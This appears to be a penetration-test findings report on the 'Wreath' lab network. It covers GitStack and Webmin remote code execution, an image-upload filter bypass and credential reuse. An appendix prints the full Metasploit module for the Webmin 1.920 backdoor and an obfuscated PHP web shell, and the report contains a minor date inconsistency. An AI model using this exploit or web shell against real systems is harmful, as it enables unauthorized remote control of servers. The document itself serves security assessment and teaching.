Wreath Network report

Wreath Security Assessment Findings Report (The following Report has been copied and pasted from the report I have produced in word, if you would like the original, with correct presentation, then drop me a message on any of my socials) Business Confidential Date: Aug 22nd, 2022 Project: 1 Version 1.0

Table of Contents Table of Contents 2 Confidentiality Statement 3 Disclaimer 3 Contact Information. 3 Assessment Overview. 4 Assessment Components 4 External Penetration Test 4 Finding Severity Ratings 5 Scope. 6 Scope Exclusions. 6 Client Allowances. 6 Executive Summary 7 Attack Summary. 7 Security Weaknesses 8 Multiple Vulnerable Services Employed. 8 Weak Password Policy. 8 Reused Credentials. 8 Vulnerable Privilege Found. 8 Vulnerabilities by Impact 9 External Penetration Test Findings. 10 Insufficient Patching – GitStack (Critical) 10 Unrestricted File Upload – ‘/resources/uploads’ (Critical) 11 Insufficient Patching – Webmin (Critical) 15 Information Disclosure– Error Page (Low) 16 Code of Exploits Used: 18 Webmin 1.920 – Unauthenticated Remote Code Execution: 18 Upload Page Obfuscated Payload Used: 18

Confidentiality Statement This document is the exclusive property of Wreath and JoshLHacking Security (JLHS) This document contains proprietary and confidential information. Duplication, redistribution, or use, in whole or in part, in any form, requires consent of both Wreath and JLHS. JHLS may share this document with auditors under non-disclosure agreements to demonstrate penetration test requirement compliance. Disclaimer A penetration test is considered a snapshot in time. The findings and recommendations reflect the information gathered during the assessment and not any changes or modifications made outside of that period. Time-limited engagements do not allow for a full evaluation of all security controls. JLHS prioritized the assessment to identify the weakest security controls an attacker would exploit. JHLS recommends conducting similar assessments on an annual basis by internal or third-party assessors to ensure the continued success of the controls. Contact Information

Assessment Overview From Aug 10th, 2022 to Aug 19th, 2019, Wreath contacted JoshLHacking Security to perform a Penetration test, and in doing so compare it’s security infrastructure to current standards. All testing performed is based on the NIST SP 800-115 Technical Guide to Information Security Testing and Assessment, OWASP Testing Guide (v4), and customized testing frameworks. Phases of penetration testing activities include the following: · Planning – Customer goals are gathered and rules of engagement obtained. · Discovery – Perform scanning and enumeration to identify potential vulnerabilities, weak areas, and exploits. · Attack – Confirm potential vulnerabilities through exploitation and perform additional discovery upon new access. · Reporting – Document all found vulnerabilities and exploits, failed attempts, and company strengths and weaknesses.

Assessment Components External Penetration Test An external penetration test emulates the role of an attacker attempting to gain access to an internal network without internal resources or inside knowledge. A JLHS engineer attempts to gather sensitive information through open-source intelligence (OSINT), including employee information, historical breached passwords, and more that can be leveraged against external systems to gain internal network access. The engineer also performs scanning and enumeration to identify potential vulnerabilities in hopes of exploitation. Finding Severity Ratings The following table defines levels of severity and corresponding CVSS score range that are used throughout the document to assess vulnerability and risk impact.

Scope

§ Full scope information provided in “Wreath-1 Full Findings.xslx”

Scope Exclusions Per client request, JLHS did not perform any Denial of Service attacks during testing. Client Allowances Wreath did not provide any allowances to assist the testing. Executive Summary

Security Weaknesses Multiple Vulnerable Services Employed JLHS leveraged multiple successful attacks against Wreath via Unpatched Versions of Services found being used on multiple machines. These included Gitstack and MiniServ. Both of these, when exploited, not only gained JLHS remote code execution (RCE), but RCE as root also, with no credentials required. Weak Password Policy JLHS successfully performed password cracking against most users on the Wreath Machines. Passwords such as noodle were used on the network, making it very easy to crack their associated hashes.

Reused Credentials Credentials were reused within Wreath and allowed JLHS to access a subdomain that asked for credentials to view. This ultimately led to the exploitation of Thomas’s Personal PC.

Vulnerable Privilege Found During the assessment, JLHS managed to gain user level access to Thomas’s Personal PC. Upon further enumeration of this machine, we found the privilege ‘SeImpersonatePrivilege’ enabled. Even though this escalation path wasn’t taken, this is very dangerous and is better off disabled. Vulnerabilities by Impact The following chart illustrates the vulnerabilities found by impact:

External Penetration Test Findings Insufficient Patching – GitStack (Critical)

Exploitation Proof of Concept JLHS found a Gitstack login portal hosted on Port 80 (System - 10.200.81.150). JLHS then attempted to use Default Credentials for this software, however the attempt was unsuccessful.

After researching Gitstack, there were multiple known exploits available for this software.

(Tool Used – Searchsploit) JLHS then attempted to use the exploit ‘Gitstack 2.3.10 – Remote Code Execution’, adapting the code to the target machine where necessary. This attempt was successful, as shown below and gave JLHS remote code execution as nt authority\system.

From this point a PowerShell web shell was inserted into the ‘command’ variable, which enabled a successful reverse shell to be initiated between JLHS and the Windows Server Machine. Remediation

Unrestricted File Upload – ‘/resources/uploads’ (Critical)

JLHS started with an Nmap scan of the machine (10.200.81.100), from the already compromised machine (10.200.81.150), this revealed that Port 80 and 3389 were open on the machine.

With this information, JLHS visited the web page hosted by this machine to reveal the following web page:

JLHS would then go on to use a technique called ‘Directory Busting’ to find any subdomains, which brought back the subdomain ‘/resources’. This subdomain revealed the following code:

JLHS were able to analyze this code to depict that it is the backend code of an Image Upload Web Page, and that it has two filters as security measures. Upon further ‘Directory Busting’ the subdomain ‘/resources/index.php’ was discovered by JLHS. This was the Image Upload Web Page and was credential protected. However, we were able to reuse credentials found earlier in the pen test to bypass this authorization.

JLHS were able to bypass the upload filters after analysis of the code found in the ‘/resources’ subdomain.

They were able to do this by using a tool called ‘exiftool’, to change the comment of a random JPG image to PHP code that the web page would run. This was successful at bypassing the Image Size Check Filter:

To bypass the Extension Check Filter, JLHS renamed the JPG image with the extension ‘.jpg.php’. This technique takes advantage of the explode() function, as the code only looks at the ‘.jpg’, and so ignores the ‘.php’. at the end when verifying if the image is valid. As you can see below, the upload was successful:

From this, JLHS were able to upload an obfuscated payload (Full code shown at end of document), and gain RCE on Thomas’s Personal PC (10.200.81.100).

Remediation

Insufficient Patching – Webmin (Critical)

JLHS started with an initial scan of the system using the network scanning tool Nmap (As shown below).

You can see from the highlighted section, that Nmap picked up the exact version of the Web Server that the machine was hosting on Port 10000. Upon further research of this Web Server version, an exploit for versions 1.890 – 1.920 was found, which gave the attacker RCE when successful. Exploit used - https://www.exploit-db.com/exploits/47230 JLHS used this exploit, and as a result gained a successful reverse shell as Root user on the Cent OS machine, with no credentials required. Remediation

Additional Reports and Scans (Informational) Information Disclosure– Error Page (Low)

JLHS started with a scan of the Windows Server machine, utilizing the tool Nmap from the CentOS Machine (10.200.81.200).

This scan provided JLHS with information about the different ports open on the Windows Server Machine (10.200.81.150). From here we could visit the web page being hosted, and as a result were directed to a 404-error page (As shown below).

This page disclosed information about 3 subdomains. Remediation

JLHS provides all clients with all report information gathered during testing. This includes vulnerability scans and a detailed findings spreadsheet. For more information, please see the following documents: § WreathNetworkNessus.xls Code of Exploits Used: Webmin 1.920 – Unauthenticated Remote Code Execution: ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Webmin 1.920 Unauthenticated RCE', 'Description' => %q{ This module exploits a backdoor in Webmin versions 1.890 through 1.920. Only the SourceForge downloads were backdoored, but they are listed as official downloads on the project's site. Unknown attacker(s) inserted Perl qx statements into the build server's source code on two separate occasions: once in April 2018, introducing the backdoor in the 1.890 release, and in July 2018, reintroducing the backdoor in releases 1.900 through 1.920. Only version 1.890 is exploitable in the default install. Later affected versions require the expired password changing feature to be enabled. }, 'Author' => [ 'AkkuS <Özkan Mustafa Akkuş>' # Discovery & PoC & Metasploit module @ehakkus ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2019-'], ['URL', 'https://www.pentest.com.tr'] ], 'Privileged' => true, 'Payload' => { 'DisableNops' => true, 'Space' => 512, 'Compat' => { 'PayloadType' => 'cmd' } }, 'DefaultOptions' => { 'RPORT' => 10000, 'SSL' => false, 'PAYLOAD' => 'cmd/unix/reverse_python' }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [['Webmin <= 1.910', {}]], 'DisclosureDate' => 'May 16 2019', 'DefaultTarget' => 0) ) register_options [ OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/']) ] end def peer "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}" end ## # Target and input verification ## def check # check passwd change priv res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "password_change.cgi"), 'headers' => { 'Referer' => "#{peer}/session_login.cgi" }, 'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1" }) if res && res.code == 200 && res.body =~ /Failed/ res = send_request_cgi( { 'method' => 'POST', 'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1", 'ctype' => 'application/x-www-form-urlencoded', 'uri' => normalize_uri(target_uri.path, 'password_change.cgi'), 'headers' => { 'Referer' => "#{peer}/session_login.cgi" }, 'data' => "user=root&pam=&expired=2&old=AkkuS%7cdir%20&new1=akkuss&new2=akkuss" }) if res && res.code == 200 && res.body =~ /password_change.cgi/ return CheckCode::Vulnerable else return CheckCode::Safe end else return CheckCode::Safe end end ## # Exploiting phase ## def exploit unless Exploit::CheckCode::Vulnerable == check fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') end command = payload.encoded print_status("Attempting to execute the payload...") handler res = send_request_cgi( { 'method' => 'POST', 'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1", 'ctype' => 'application/x-www-form-urlencoded', 'uri' => normalize_uri(target_uri.path, 'password_change.cgi'), 'headers' => { 'Referer' => "#{peer}/session_login.cgi" }, 'data' => "user=root&pam=&expired=2&old=AkkuS%7c#{command}%20&new1=akkuss&new2=akkuss" }) end end Upload Page Obfuscated Payload Used: <?php \$p0=\$_GET[base64_decode('d3JlYXRo')];if(isset(\$p0)){echo base64_decode('PHByZT4=').shell_exec(\$p0).base64_decode('PC9wcmU+');}die();?>

Last Page